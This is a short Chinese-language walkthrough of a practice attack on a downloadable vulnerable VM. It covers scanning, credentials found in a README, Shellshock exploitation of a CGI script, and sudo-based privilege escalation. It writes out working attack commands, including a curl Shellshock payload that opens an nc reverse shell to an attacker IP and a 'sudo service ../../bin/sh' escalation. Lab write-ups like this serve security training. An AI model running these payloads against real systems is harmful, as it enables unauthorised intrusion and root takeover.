前言
这是打靶训练的第13周,靶机下载,难度中
信息搜集
nmap扫描结果
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian)) 网站首页,尝试了弱口令登录失败。
查看news.php的源码,发现一个cgi-bin,先记录下来
进行目录扫描,得到README.md和admin_login.php
在README.md找到源码地址
获取到用户名:admin 密码:password123,再次尝试登录网站首页失败
来到网站后台,使用此账号登录成功
点击Add Customer,乱输一些信息
点击Submit后,出现sql信息,这里有sql注入,但突破点不是在这里
破壳漏洞
回到刚刚发现的cgi-bin目录,再次使用dirsearch进行扫描python dirsearch.py -u http://10.16.122.120/cgi-bin/ -f -e cgi,sh
获取到shell.sh,使用nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh,cmd=ls 10.16.122.120进行破壳漏洞探测
存在破壳漏洞,curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'which nc'" \http://10.16.122.120/cgi-bin/shell.sh ,存在nc
执行反弹shell curl -H "user-agent: () { :; }; echo;echo;/bin/bash -c 'nc -e /bin/bash 10.16.122.28 4444'" \http://10.16.122.120/cgi-bin/shell.sh。
获取到shell,升级为交互式shell python3 -c 'import pty;pty.spawn("/bin/bash")'
提权
sudo -l,thor用户可以无密码执行/home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.sh,依次输入id,可看到命令被执行了
直接输入bash,获取到thor用户的权限
再次输入sudo -l,查询gtfobins,可使用sudo service ../../bin/sh进行提权